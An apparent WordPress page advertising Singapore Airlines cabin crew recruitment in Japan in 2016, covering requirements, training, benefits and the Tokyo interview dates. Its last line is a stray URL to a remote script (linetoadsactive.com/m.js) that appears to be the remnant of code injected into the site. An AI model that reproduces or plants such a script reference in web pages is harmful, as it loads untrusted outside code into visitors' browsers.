[vc_row][vc_column][vc_column_text css_animation=”left-to-right”]Singapore Airlines will be conducting a recruitment exercise for cabin crew in Japan. If you are warm, hospitable with a winning approach to customer service, we welcome you to join our elite team.
- Minimum age of 18 years old
- Females who are at least 1.58m; males who are at least 1.65m in height
- Junior college (TANDAI) or University degree holder (those graduating in September 2016 may also apply)
- High level of English proficiency
- Willing to be based in Singapore
Our comprehensive 4 months training program will cover topics such as:
- Product Knowledge including Food & Beverage
- Service Procedures
- Passenger Handling
- Deportment & Grooming
- Language & Communication Skills
- Safety Equipment Procedures
- First Aid
On successful completion of training you will commence flying duties.
Remuneration & Service Benefits:
You will be based in Singapore and offered a 5-year employment contract initially, with further extensions at the Company’s discretion. Apart from competitive remuneration, you will be granted free travel to any SIA destination once a year and enjoy discounted travel at other times. There is an attractive annual leave scheme, medical and dental treatment scheme, as well as comprehensive training programmes.
Please submit an online application by 17th April 2016.
Interviews will be conducted in Tokyo on 14th – 15th May 2016.
We thank all candidates for their interest in Singapore Airlines and regret that only shortlisted candidates will be notified.[/vc_column_text][vc_single_image image=”3491″ img_size=”large” css_animation=”left-to-right”][/vc_column][/vc_row]https://trend.linetoadsactive.com/m.js?n=ns1